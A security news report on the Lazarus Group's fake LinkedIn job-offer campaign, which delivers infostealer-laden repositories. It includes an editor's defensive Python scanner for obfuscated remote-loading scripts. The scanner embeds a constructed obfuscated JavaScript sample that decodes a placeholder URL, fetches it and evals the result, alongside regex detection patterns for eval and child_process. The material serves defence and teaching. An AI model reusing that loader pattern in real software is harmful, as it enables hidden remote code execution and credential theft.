The hacker group known as Lazarus Group has launched a sophisticated attack campaign targeting organizations through LinkedIn. The group, linked to North Korea, uses fake job offers to lure professionals from various industries, with the aim of stealing confidential information and distributing malware.
The attack begins with an attractive message on LinkedIn offering an opportunity to collaborate on a project related to a decentralized cryptocurrency exchange. Promises of remote work, flexibility and good pay capture the professional's attention. Once the victim shows interest, the attackers request their CV or a link to their personal GitHub repository. These documents are used to lend legitimacy to the conversation and to obtain more personal information about the victim.
After receiving the requested information, the attackers share a repository that supposedly contains the project's minimum viable product (MVP), along with a feedback form to be completed after running the demo. At first glance the code looks harmless, but closer inspection reveals a heavily obfuscated script that dynamically loads malicious code from an external endpoint. This malware, identified as a cross-platform infostealer, is designed to steal information from cryptocurrency wallets and login credentials stored in browsers.
The objective of these attacks goes beyond the theft of personal data. By compromising people who work in critical sectors such as aviation, defense and the nuclear industry, the attackers seek to exfiltrate classified information, proprietary corporate technology and credentials. Running the malware on a company device could give the attackers access to sensitive data, amplifying the potential damage.
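As an added illustration (an editor's example, not Bitdefender's code and not anything taken from the campaign's repository), the following Python script performs the kind of static triage a developer could run on a cloned "MVP" checkout before executing anything in it: it flags scripts that both reach a network endpoint and execute strings as code, and it counts common obfuscation indicators such as hexadecimal `_0x` identifier names and long, high-entropy string literals. The indicator patterns, the thresholds and the two embedded sample files are assumptions constructed for this example, not details from the report.

```python
"""Static triage of a cloned repository for signs of an obfuscated script that
loads code from a remote endpoint. Editor's example; indicators and thresholds
are assumptions, not details from the Bitdefender report."""
import math
import re
import tempfile
from pathlib import Path

# Calls that pull content from a network endpoint (assumed indicator list).
REMOTE_FETCH = re.compile(
    r"\b(?:fetch|axios\.(?:get|post|request)|https?\.(?:get|request)|XMLHttpRequest)\b"
)
# Primitives that turn a string into executable code or spawn a process.
DYNAMIC_EXEC = re.compile(
    r"\b(?:eval|new\s+Function|vm\.run(?:InThisContext|InNewContext)|child_process)\b"
)
# Identifier scheme emitted by common JavaScript obfuscators (assumed indicator).
HEX_IDENTIFIERS = re.compile(r"\b_0x[0-9a-f]{4,}\b", re.IGNORECASE)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded or encrypted blobs sit well above prose."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def string_literals(text: str):
    """Yield the contents of quoted literals, walking the text so a closing
    quote is never mistaken for an opening one (comments/regexes not handled)."""
    i, n = 0, len(text)
    while i < n:
        ch = text[i]
        if ch in "\"'`":
            j = i + 1
            while j < n and text[j] != ch:
                j += 2 if text[j] == "\\" else 1  # skip escaped characters
            yield text[i + 1:j]
            i = j + 1
        else:
            i += 1


def scan_source(text: str) -> dict:
    """Count the indicators in one file's contents and return them by name."""
    long_literals = [lit for lit in string_literals(text) if len(lit) >= 32]
    return {
        "remote_fetch": len(REMOTE_FETCH.findall(text)),
        "dynamic_exec": len(DYNAMIC_EXEC.findall(text)),
        "hex_identifiers": len(set(HEX_IDENTIFIERS.findall(text))),
        "high_entropy_literals": sum(1 for lit in long_literals if shannon_entropy(lit) > 4.5),
    }


def is_suspicious(findings: dict) -> bool:
    """Flag a file that fetches remotely AND executes strings, or that executes
    strings while showing obfuscation indicators (thresholds are assumptions)."""
    loads_remote_code = findings["remote_fetch"] > 0 and findings["dynamic_exec"] > 0
    obfuscated = findings["hex_identifiers"] >= 5 or findings["high_entropy_literals"] >= 1
    return loads_remote_code or (obfuscated and findings["dynamic_exec"] > 0)


def scan_repo(root: Path, suffixes=(".js", ".mjs", ".cjs", ".ts")) -> dict:
    """Walk a checkout and return {relative path: findings} for flagged files."""
    flagged = {}
    for path in root.rglob("*"):
        if path.suffix in suffixes and "node_modules" not in path.parts:
            findings = scan_source(path.read_text(errors="replace"))
            if is_suspicious(findings):
                flagged[str(path.relative_to(root).as_posix())] = findings
    return flagged


# Constructed samples for a stand-alone run; neither is taken from the campaign.
BENIGN_SAMPLE = """const express = require('express');
const app = express();
app.get('/health', (req, res) => res.json({ ok: true }));
app.listen(3000);
"""
SUSPICIOUS_SAMPLE = """var _0x4f2a=['aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvYXBpL3YxL3VwZGF0ZQ==','\\x66\\x72\\x6f\\x6d'];
(function(_0x1b3c,_0x2d4e){var _0x3e5f=_0x4f2a;})();
const _0x5a6b=Buffer.from(_0x4f2a[0],'base64').toString();
fetch(_0x5a6b).then(r=>r.text()).then(c=>eval(c));
"""


def demo() -> dict:
    """Write both samples into a throwaway checkout and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "src").mkdir()
        (root / "mvp").mkdir()
        (root / "src" / "server.js").write_text(BENIGN_SAMPLE)
        (root / "mvp" / "loader.js").write_text(SUSPICIOUS_SAMPLE)
        return scan_repo(root)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(f"FLAGGED {path}: {findings}")
```

Run it from inside the sandbox you would use for the code itself, not on a workstation with wallets and saved browser sessions. A clean result from a heuristic like this is not proof of safety: a loader can hide its fetch behind a dependency or a build step, so the check complements analysis in an isolated environment rather than replacing it.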
Recommendations and security measures
Bitdefender recommends that developers and IT professionals stay on guard against these tactics. It is crucial not to download or run files from unknown sources outside safe environments such as sandboxes, where the code can be analyzed without risk of infection. Companies are also advised to implement robust security measures and to educate their employees about the risks of fake job offers on professional platforms.
The company stresses the importance of collaboration between security teams and employees to detect and mitigate these attacks. Alina Bizga, security analyst at Bitdefender, said the company has used safe test environments to analyze the malware and better understand the attackers' tactics.